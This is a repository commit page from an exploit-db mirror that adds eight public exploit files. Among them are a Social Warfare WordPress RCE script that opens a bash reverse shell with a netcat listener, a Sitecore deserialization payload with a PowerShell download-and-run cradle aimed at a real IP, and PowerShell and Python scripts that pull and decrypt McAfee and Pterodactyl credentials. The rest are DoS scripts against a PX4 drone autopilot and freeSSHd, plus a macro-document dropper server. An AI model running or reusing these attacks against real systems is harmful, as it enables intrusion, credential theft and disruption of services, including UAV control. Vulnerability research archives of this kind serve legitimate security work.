bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-06-28 00:01:52 +00:00
commit 490d844e10
9 changed files with 829 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

84
exploits/linux/remote/52340.txt Normal file
View file

@ -0,0 +1,84 @@
- **Exploit Title**: OneTrust SDK 6.33.0 - Denial Of Service (DoS)
- **Date**: 01/01/2025
- **Exploit Author**: Alameen Karim Merali
- **Vendor Homepage**: [OneTrust JavaScript API](https://developer.onetrust.com/onetrust/docs/javascript-api)
- **Software Link**: [otBannerSdk.js v6.33.0](https://discord.com/assets/oneTrust/v4/scripttemplates/6.33.0/otBannerSdk.js)
- **Version**: 6.33.0
- **Tested on**: Kali Linux
- **CVE ID**: CVE-2024-57708
## Vulnerability Summary
A vulnerability exists in **OneTrust SDK v6.33.0** that allows an attacker to perform **Prototype Pollution** via the misuse of `Object.setPrototypeOf` and `Object.assign`. An attacker can inject malicious properties into the prototype chain, potentially causing **Denial of Service (DoS)** or altering the behavior of inherited objects throughout the application.
## Technical Details
The affected code includes prototype assignment logic such as:
```javascript
var o = function(e, t) {
return (o = Object.setPrototypeOf || { __proto__: [] } instanceof ...);
};
```
If the `t` argument (a user-supplied object) contains a `__proto__` or `constructor.prototype` reference, it can pollute `Object.prototype` globally.
## Proof-of-Concept (PoC)
```javascript
function testPrototypePollution() {
const maliciousPayload = {
"__proto__": {
polluted: "yes"
}
};
// Using vulnerable function 'o'
try {
o({}, maliciousPayload);
console.log("After o:", {}.polluted); // "yes"
} catch (e) {
console.error("Error testing o:", e);
}
// Using Object.assign
try {
Object.assign({}, maliciousPayload);
console.log("After Object.assign:", {}.polluted); // "yes"
} catch (e) {
console.error("Error testing Object.assign:", e);
}
// Cleanup
delete Object.prototype.polluted;
}
testPrototypePollution();
```
## Browser Console PoC (DevTools)
```javascript
var maliciousObj = { __proto__: { hacked: true } };
var newObj = Object.create(maliciousObj);
console.log(newObj.hacked); // true
```
Screenshot: [PoC Screenshot](https://ibb.co/B2hyYr5v)
## Steps to Reproduce
1. Save the PoC script above as `exploit.js`
2. Run using Node.js: `node exploit.js`
3. Observe polluted output (`{}.polluted === "yes"`)
4. Alternatively, run the payload in browser DevTools
## Impact
- Global object pollution
- Application logic errors
- Potential DoS
- Further exploitation depending on context
## Recommendation
Developers should upgrade to a patched version and sanitize any user input used in object merging or prototype manipulation.

97
exploits/multiple/remote/52339.py Executable file
View file

@ -0,0 +1,97 @@
# Exploit Title: PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-21
# Tested on: Ubuntu 20.04 LTS + PX4 SITL (jMAVSim)
# CVE: CVE-2025-5640
# Type: Denial of Service (DoS) via Buffer Overflow
# Platform: Cross-platform (Military UAVs / PX4 SITL / Linux-based autopilot ground station)
# Author Country: Jordan
# Description:
# A stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot <=1.12.3 is triggered
# when handling a malformed MAVLink message of type TRAJECTORY_REPRESENTATION_WAYPOINTS.
# An attacker with access to the MAVLink communication channel can send a crafted packet
# to crash the autopilot, potentially disrupting military UAV operations. This exploit demonstrates
# a proof-of-concept that causes the PX4 autopilot to crash via UDP.
import argparse
import binascii
from pymavlink import mavutil
import sys
# Exploit payload (malformed MAVLink hex)
hex_payload = (
"fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352"
"c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b78"
"12731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6"
)
def connect_to_px4(ip, port, timeout, verbose=False):
try:
if verbose:
print(f"[*] Connecting to PX4 at udp:{ip}:{port} ...")
master = mavutil.mavlink_connection(f"udp:{ip}:{port}")
master.wait_heartbeat(timeout=timeout)
if verbose:
print("[+] PX4 heartbeat received. Connection OK.")
return master
except Exception as e:
print(f"[!] Error connecting to PX4: {e}")
sys.exit(1)
def send_dos_packet(master, verbose=False):
try:
payload = binascii.unhexlify(hex_payload)
master.write(payload)
print("[+] Exploit packet sent. Monitor PX4 for crash.")
except Exception as e:
print(f"[!] Failed to send payload: {e}")
sys.exit(1)
def main():
usage = """
PX4 Exploit Tool - CVE-2025-5640
=================================
Exploit a buffer overflow vulnerability in PX4 autopilot via MAVLink.
USAGE:
python3 px4_exploit_tool.py [OPTIONS]
EXAMPLES:
# Run DoS attack on default PX4 SITL
python3 px4_exploit_tool.py --mode dos
# Test connectivity to a real drone
python3 px4_exploit_tool.py --mode check --ip 192.168.10.10 --port 14550
OPTIONS:
--ip Target IP address (default: 127.0.0.1)
--port Target UDP port (default: 14540)
--mode Mode of operation: dos (default), check
--timeout Timeout in seconds for heartbeat (default: 5)
--verbose Enable verbose output
"""
parser = argparse.ArgumentParser(
description="PX4 MAVLink DoS Exploit Tool (CVE-2025-5640) by @banyamer_security",
epilog=usage,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("--ip", default="127.0.0.1", help="Target IP address (default: 127.0.0.1)")
parser.add_argument("--port", type=int, default=14540, help="Target UDP port (default: 14540)")
parser.add_argument("--timeout", type=int, default=5, help="Timeout in seconds for heartbeat (default: 5)")
parser.add_argument("--mode", choices=["dos", "check"], default="dos", help="Mode: dos (default) or check connection")
parser.add_argument("--verbose", action="store_true", help="Enable verbose output")
args = parser.parse_args()
master = connect_to_px4(args.ip, args.port, args.timeout, args.verbose)
if args.mode == "check":
print("[*] PX4 is alive. Connection test passed.")
elif args.mode == "dos":
send_dos_packet(master, args.verbose)
if __name__ == "__main__":
main()

182
exploits/multiple/remote/52345.txt Normal file
View file

@ -0,0 +1,182 @@
Exploit Title: McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information
Date: 24 June 2025
Exploit Author: Keenan Scott
Vendor Homepage: hxxps[://]www[.]mcafee[.]com/
Software Download: N/A (Unable to find)
Version: < 5.7.6
Tested on: Windows 11
CVE: CVE-2022-1257
<#
.SYNOPSIS
Dump and decrypt encrypted Windows credentials from Trellix Agent Database ("C:\ProgramData\McAfee\Agent\DB\ma.db") - PoC for CVE-2022-1257. Made by scottk817
.DESCRIPTION
This script demonstrates exploitation of CVE-2022-1257, a vulnerability in McAfee's Trellix Agent Database where attackers can retrieve and decrypt credentials from the `ma.db` database file.
.LINK
https://nvd.nist.gov/vuln/detail/cve-2022-1257
https://github.com/funoverip/mcafee-sitelist-pwd-decryption/blob/master/mcafee_sitelist_pwd_decrypt.py
https://mrd0x.com/abusing-mcafee-vulnerabilities-misconfigurations/
https://tryhackme.com/room/breachingad
.OUTPUTS
CSV in stdOut:
Username,Password
#>
# Arguments
[CmdletBinding()]
param (
[string]$DbSource = 'C:\ProgramData\McAfee\Agent\DB\ma.db',
[string]$TempFolder = $env:TEMP
)
### Initialize use of WinSQLite3 ###
$cls = "WinSQLite_{0}" -f ([guid]::NewGuid().ToString('N'))
$code = @"
using System;
using System.Runtime.InteropServices;
public static class $cls
{
public const int SQLITE_OK = 0;
public const int SQLITE_ROW = 100;
[DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
public static extern int sqlite3_open_v2(
[MarshalAs(UnmanagedType.LPStr)] string filename,
out IntPtr db,
int flags,
IntPtr vfs
);
[DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
public static extern int sqlite3_close(IntPtr db);
[DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
public static extern int sqlite3_prepare_v2(
IntPtr db, string sql, int nByte,
out IntPtr stmt, IntPtr pzTail
);
[DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
public static extern int sqlite3_step(IntPtr stmt);
[DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
public static extern IntPtr sqlite3_column_text(IntPtr stmt, int col);
[DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
public static extern int sqlite3_finalize(IntPtr stmt);
}
"@
# SQL statement to retrieve usersnames and encrypted passwords from ma.db
$sql = @"
SELECT AUTH_USER, AUTH_PASSWD
FROM AGENT_REPOSITORIES
WHERE AUTH_PASSWD IS NOT NULL;
"@
Add-Type -TypeDefinition $code -PassThru | Out-Null
$type = [type]$cls
### Decode and Decrypt ###
# Function to decode, and decrypt the credentials found in the DB using the static keys used for every Trellix agent.
function Invoke-McAfeeDecrypt {
param([string]$B64)
[byte[]]$mask = 0x12,0x15,0x0F,0x10,0x11,0x1C,0x1A,0x06,
0x0A,0x1F,0x1B,0x18,0x17,0x16,0x05,0x19
[byte[]]$buf = [Convert]::FromBase64String($B64.Trim())
for ($i = 0; $i -lt $buf.Length; $i++) {
$buf[$i] = $buf[$i] -bxor $mask[$i % $mask.Length]
}
$sha = [System.Security.Cryptography.SHA1]::Create()
[byte[]]$key = $sha.ComputeHash([Text.Encoding]::ASCII.GetBytes("<!@#$%^>")) + (0..3 | ForEach-Object { 0 })
$tdes = [System.Security.Cryptography.TripleDES]::Create()
$tdes.Mode = 'ECB'
$tdes.Padding = 'None'
$tdes.Key = $key
[byte[]]$plain = $tdes.CreateDecryptor().TransformFinalBlock($buf, 0, $buf.Length)
$i = 0
while ($i -lt $plain.Length -and $plain[$i] -ge 0x20 -and $plain[$i] -le 0x7E) {
$i++
}
if ($i -eq 0) { return '' }
[Text.Encoding]::UTF8.GetString($plain, 0, $i)
}
### Copy ma.db ###
# Copy ma.db over to temp directory add GUID incase it already exists there.
$tmp = Join-Path $TempFolder ("ma_{0}.db" -f ([guid]::NewGuid()))
Copy-Item -LiteralPath $DbSource -Destination $tmp -Force
### Pull records ###
$dbPtr = [IntPtr]::Zero
$stmtPtr = [IntPtr]::Zero
$flags = 1
$rc = $type::sqlite3_open_v2($tmp, [ref]$dbPtr, $flags, [IntPtr]::Zero)
if ($rc -ne $type::SQLITE_OK) {
$msg = [Runtime.InteropServices.Marshal]::PtrToStringAnsi(
$type::sqlite3_errmsg($dbPtr))
Throw "sqlite3_open_v2 failed (code $rc) : $msg"
}
$rc = $type::sqlite3_prepare_v2($dbPtr, $sql, -1, [ref]$stmtPtr, [IntPtr]::Zero)
if ($rc -ne $type::SQLITE_OK) {
$msg = [Runtime.InteropServices.Marshal]::PtrToStringAnsi(
$type::sqlite3_errmsg($dbPtr))
$type::sqlite3_close($dbPtr) | Out-Null
Throw "sqlite3_prepare_v2 failed (code $rc) : $msg"
}
$buffer = [System.Collections.Generic.List[string]]::new()
while ($type::sqlite3_step($stmtPtr) -eq $type::SQLITE_ROW) {
$uPtr = $type::sqlite3_column_text($stmtPtr, 0)
$pPtr = $type::sqlite3_column_text($stmtPtr, 1)
$user = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($uPtr)
$pass = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($pPtr)
if ($user -and $pass) {
$buffer.Add("$user,$pass")
}
}
### Cleanup ###
# Finish and close SQL
$type::sqlite3_finalize($stmtPtr) | Out-Null
$type::sqlite3_close($dbPtr) | Out-Null
# Delete the ma.db file copied to the temp file
Remove-Item $tmp -Force -ErrorAction SilentlyContinue
### Process encrypted credentials ###
# For each row of credentials decrypt them and print plaintext to standard out.
foreach ($line in $buffer) {
$rec = $line -split ',', 2
if ($rec.Length -eq 2) {
$username = $rec[0]
try {
$password = Invoke-McAfeeDecrypt $rec[1]
} catch {
$password = "[DECRYPT-ERROR] $_"
}
"Username,Password"
"$username,$password"
}
}

48
exploits/multiple/webapps/52341.py Executable file
View file

@ -0,0 +1,48 @@
# Exploit Title: Pterodactyl Panel 1.11.11 - Remote Code Execution (RCE)
# Date: 22/06/2025
# Exploit Author: Zen-kun04
# Vendor Homepage: https://pterodactyl.io/
# Software Link: https://github.com/pterodactyl/panel
# Version: < 1.11.11
# Tested on: Ubuntu 22.04.5 LTS
# CVE: CVE-2025-49132
import requests
import json
import argparse
import colorama
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
arg_parser = argparse.ArgumentParser(
description="Check if the target is vulnerable to CVE-2025-49132.")
arg_parser.add_argument("target", help="The target URL")
args = arg_parser.parse_args()
try:
target = args.target.strip() + '/' if not args.target.strip().endswith('/') else args.target.strip()
r = requests.get(f"{target}locales/locale.json?locale=../../../pterodactyl&namespace=config/database", allow_redirects=True, timeout=5, verify=False)
if r.status_code == 200 and "pterodactyl" in r.text.lower():
try:
raw_data = r.json()
data = {
"success": True,
"host": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("host", "N/A"),
"port": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("port", "N/A"),
"database": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("database", "N/A"),
"username": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("username", "N/A"),
"password": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("password", "N/A")
}
print(f"{colorama.Fore.LIGHTGREEN_EX}{target} => {data['username']}:{data['password']}@{data['host']}:{data['port']}/{data['database']}{colorama.Fore.RESET}")
except json.JSONDecodeError:
print(colorama.Fore.RED + "Not vulnerable" + colorama.Fore.RESET)
except TypeError:
print(colorama.Fore.YELLOW + "Vulnerable but no database" + colorama.Fore.RESET)
else:
print(colorama.Fore.RED + "Not vulnerable" + colorama.Fore.RESET)
except requests.RequestException as e:
if "NameResolutionError" in str(e):
print(colorama.Fore.RED + "Invalid target or unable to resolve domain" + colorama.Fore.RESET)
else:
print(f"{colorama.Fore.RED}Request error: {e}{colorama.Fore.RESET}")

56
exploits/multiple/webapps/52344.py Executable file
View file

@ -0,0 +1,56 @@
# Exploit Title: Sitecore 10.4 - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://developers.sitecore.com/downloads
# Version: Sitecore 10.3 - 10.4
# CVE : CVE-2025-27218
# Link: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py
from requests import Request, Session
import sys
import base64
def title():
print('''
_______ ________ ___ ___ ___ _____ ___ ______ ___ __ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \____ |__ \/_ |/ _ \
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | / / ) || | (_) |
| | \ \/ / | __|______/ /| | | |/ /|___ \______/ / / / / / | |> _ <
| |____ \ / | |____ / /_| |_| / /_ ___) | / /_ / / / /_ | | (_) |
\_____| \/ |______| |____|\___/____|____/ |____/_/ |____||_|\___/
[+] Remote Code Execution
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py
''')
def exploit(url):
# This payload must be generated externally with ysoserial.net
# Example: ./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe -nop -w hidden -c 'IEX(New-Object Net.WebClient).DownloadString(\"http://34.134.71.169/111.html\")'"
payload = 'AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA2ApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBb3dZOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUhCdmQyVnljMmhsYkd3dVpYaGxJQzF1YjNBZ0xYY2dhR2xrWkdWdUlDMWpJQ2RKUlZnb1RtVjNMVTlpYW1WamRDQk9aWFF1VjJWaVEyeHBaVzUwS1M1RWIzZHViRzloWkZOMGNtbHVaeWdtY1hWdmREc2dhSFIwY0Rvdkx6RXdMakV3TGpFd0xqRXdMekV4TVM1b2RHMXNYQ2tuSWlCVGRHRnVaR0Z5WkVWeWNtOXlSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJUZEdGdVpHRnlaRTkxZEhCMWRFVnVZMjlrYVc1blBTSjdlRHBPZFd4c2ZTSWdWWE5sY2s1aGJXVTlJaUlnVUdGemMzZHZjbVE5SW50NE9rNTFiR3g5SWlCRWIyMWhhVzQ5SWlJZ1RHOWhaRlZ6WlhKUWNtOW1hV3hsUFNKR1lXeHpaU0lnUm1sc1pVNWhiV1U5SW1OdFpDSWdMejROQ2lBZ0lDQWdJRHd2YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnUEM5elpEcFFjbTlqWlhOelBnMEtJQ0E4TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2k1UFltcGxZM1JKYm5OMFlXNWpaVDROQ2p3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeVBncz0L'
payload_encoded = payload
headers = {'Thumbnailsaccesstoken': payload_encoded}
s = Session()
req = Request('GET', url, headers=headers)
prepped = req.prepare()
resp = s.send(prepped, verify=False, timeout=15)
print(prepped.headers)
print(url)
print(resp.status_code)
print(resp.text)
if __name__ == '__main__':
title()
if len(sys.argv) < 2:
print('[+] USAGE: python3 %s https://<target_url>\n' % sys.argv[0])
print('[+] Example: python3 %s https://192.168.0.10\n' % sys.argv[0])
exit(0)
else:
exploit(sys.argv[1])

103
exploits/multiple/webapps/52346.py Executable file
View file

@ -0,0 +1,103 @@
#!/usr/bin/env python3
# Exploit Title: Social Warfare WordPress Plugin 3.5.2 - Remote Code Execution (RCE)
# Date: 25-06-2025
# Exploit Author: Huseyin Mardini (@housma)
# Original Researcher: Luka Sikic
# Original Exploit Author: hash3liZer
# Vendor Homepage: https://wordpress.org/plugins/social-warfare/
# Software Link: https://downloads.wordpress.org/plugin/social-warfare.3.5.2.zip
# Version: <= 3.5.2
# CVE: CVE-2019-9978
# Tested On: WordPress 5.1.1 with Social Warfare 3.5.2 (on Ubuntu 20.04)
# Python Version: Python 3.x
# Reference: https://www.exploit-db.com/exploits/46794
# Github (original PoC): https://github.com/hash3liZer/CVE-2019-9978
# The currently listed exploit for *CVE-2019-9978* (Exploit ID 46794<https://www.exploit-db.com/exploits/46794>) appears to no longer work as intended in many modern environments
# Usage:
# 1. Edit the config section below and replace `ATTACKER_IP` with your machine's IP.
# 2. Run the script: `python3 exploit.py`
# 3. It will:
# - Create a PHP payload and save it as `payload.txt` (or any filename you set in PAYLOAD_FILE)
# - Start an HTTP server on `HTTP_PORT` to host the payload
# - Start a Netcat listener on `LISTEN_PORT`
# - Trigger the vulnerability via the vulnerable `swp_debug` parameter
# 4. On success, you get a reverse shell as `www-data`.
#
# Note:
# - PAYLOAD_FILE defines only the name of the file to be created and served.
# - Make sure ports 8001 and 4444 are open and not in use.
import requests
import threading
import http.server
import socketserver
import os
import subprocess
import time
# --- Config ---
TARGET_URL = "http://example.com"
ATTACKER_IP = "xxx.xxx.xx.xx" # Change to your attack box IP
HTTP_PORT = 8000
LISTEN_PORT = 4444
PAYLOAD_FILE = "payload.txt"
def create_payload():
"""Write exact reverse shell payload using valid PHP syntax"""
payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
with open(PAYLOAD_FILE, "w") as f:
f.write(payload)
print(f"[+] Payload written to {PAYLOAD_FILE}")
def start_http_server():
"""Serve payload over HTTP"""
handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
print(f"[+] HTTP server running at port {HTTP_PORT}")
httpd.serve_forever()
def start_listener():
"""Start Netcat listener"""
print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])
def send_exploit():
"""Trigger the exploit with vulnerable parameter"""
payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}"
exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
print(f"[+] Sending exploit: {exploit}")
try:
requests.get(exploit, timeout=5)
except requests.exceptions.RequestException:
pass
def main():
create_payload()
# Start web server in background
http_thread = threading.Thread(target=start_http_server, daemon=True)
http_thread.start()
time.sleep(2) # Give server time to start
# Start listener in background
listener_thread = threading.Thread(target=start_listener)
listener_thread.start()
time.sleep(1)
# Send the malicious request
send_exploit()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("[-] Interrupted by user.")

95
exploits/windows/remote/52342.txt Normal file
View file

@ -0,0 +1,95 @@
# Exploit Title: freeSSHd 1.0.9 - Denial of Service (DoS)
# Date: 2024-01-13
# Discovery by: Fernando Mengali
# Linkedin: https://www.linkedin.com/in/fernando-mengali/
# Software Link: https://www.exploit-db.com/apps/be82447d556d60db55053d658b4822a8-freeSSHd.exe
# Version: 1.0.9
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Tested on: Windows XP - SP3 - English
# CVE: CVE-2024-0723
use IO::Socket;
#2. Proof of Concept - PoC
$sis="$^O";
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
intro();
main();
print "[+] Exploiting... \n";
my $bufff =
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"x18;
my $payload =
"\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" .
"\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde".("A" x 1067);
$payload .= $payload;
$payload .= "C" x 19021 . "\r\n";
my $i=0;
while ($i<=18) {
my $sock = IO::Socket::INET->new(
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp'
) or die "Cannot connect!\n";
if (<$sock> eq '') {
print "[+] Done - Exploited success!!!!!\n\n";
exit;
}
$sock->send($payload) or die "Exploited successuful!!!";
$i++;
}
sub intro {
print q {
_/|
// o\
|| ._)
//__\
)___(
[+] freeSSHd 1.0.9 - Denial of Service (DoS)
[*] Coded by Fernando Mengali
[@] e-mail: fernando.mengalli@gmail.com
}
}
sub main {
our ($ip, $port) = @ARGV;
unless (defined($ip) && defined($port)) {
print " \nUsage: $0 <ip> <port> \n";
exit(-1);
}
}

156
exploits/windows/remote/52343.py Executable file
View file

@ -0,0 +1,156 @@
# Exploit Title: Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)
# Author: nu11secur1ty
# Date: 06/24/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
# Reference:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165
# CVE: CVE-2025-47165
# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021,
Microsoft 365 Apps for Enterprise
# Description:
The attacker can trick any user into opening and executing their code by
sending a malicious DOCM file via email or a streaming server. After the
execution of the victim, his machine can be infected or even worse than
ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE
MACROS OPTIONS FROM YOUR OFFICE 365!!!
#!/usr/bin/python
import os
import sys
import pythoncom
from win32com.client import Dispatch
import http.server
import socketserver
import socket
import threading
import zipfile
PORT = 8000
DOCM_FILENAME = "salaries.docm"
ZIP_FILENAME = "salaries.zip"
DIRECTORY = "."
def create_docm_with_macro(filename=DOCM_FILENAME):
pythoncom.CoInitialize()
word = Dispatch("Word.Application")
word.Visible = False
try:
doc = word.Documents.Add()
vb_project = doc.VBProject
vb_component = vb_project.VBComponents("ThisDocument")
macro_code = '''
Sub AutoOpen()
//YOUR EXPLOIT HERE
// All OF YPU PLEASE WATCH THE DEMO VIDEO
// Best Regards to packetstorm.news and OFFSEC
End Sub
'''
vb_component.CodeModule.AddFromString(macro_code)
doc.SaveAs(os.path.abspath(filename), FileFormat=13)
print(f"[+] Macro-enabled Word document created: {filename}")
except Exception as e:
print(f"[!] Error creating document: {e}")
finally:
doc.Close(False)
word.Quit()
pythoncom.CoUninitialize()
def zip_docm(docm_path, zip_path):
with zipfile.ZipFile(zip_path, 'w', compression=zipfile.ZIP_DEFLATED)
as zipf:
zipf.write(docm_path, arcname=os.path.basename(docm_path))
print(f"[+] Created ZIP archive: {zip_path}")
def get_local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
ip = "127.0.0.1"
finally:
s.close()
return ip
class Handler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, directory=DIRECTORY, **kwargs)
def run_server():
ip = get_local_ip()
print(f"[+] Starting HTTP server on http://{ip}:{PORT}")
print(f"[+] Place your macro docm and zip files in this directory to
serve them.")
print(f"[+] Access the ZIP file at: http://{ip}:{PORT}/{ZIP_FILENAME}")
with socketserver.TCPServer(("", PORT), Handler) as httpd:
print("[+] Server running, press Ctrl+C to stop")
httpd.serve_forever()
if __name__ == "__main__":
if os.name != "nt":
print("[!] This script only runs on Windows with MS Word
installed.")
sys.exit(1)
print("[*] Creating the macro-enabled document...")
create_docm_with_macro(DOCM_FILENAME)
print("[*] Creating ZIP archive of the document...")
zip_docm(DOCM_FILENAME, ZIP_FILENAME)
print("[*] Starting HTTP server in background thread...")
server_thread = threading.Thread(target=run_server, daemon=True)
server_thread.start()
try:
while True:
pass # Keep main thread alive
except KeyboardInterrupt:
print("\n[!] Server stopped by user.")
```
# Reproduce:
[href](https://www.youtube.com/watch?v=CSb76-OG-Tg)
# Buy an exploit only:
[href](https://satoshidisk.com/pay/COiBVA)
# Time spent:
01:37:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

8
files_exploits.csv
View file

@ -8544,6 +8544,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22046,exploits/linux/remote/22046.c,"Null HTTPd 0.5 - Remote Heap Corruption",2002-11-26,eSDee,remote,linux,,2002-11-26,2012-10-17,1,,,,,,http://www.netric.org/advisories/netric-adv009.txt
21818,exploits/linux/remote/21818.c,"Null HTTPd 0.5 - Remote Heap Overflow",2002-09-23,eSDee,remote,linux,,2002-09-23,2012-10-09,1,CVE-2002-1496;OSVDB-9212,,,,,http://www.netric.org/advisories/netric-adv009.txt
25010,exploits/linux/remote/25010.txt,"O3Read 0.0.3 - HTML Parser Buffer Overflow",2004-12-17,"Wiktor Kopec",remote,linux,,2004-12-17,2013-04-30,1,CVE-2004-1288;OSVDB-12457,,,,,https://www.securityfocus.com/bid/12000/info
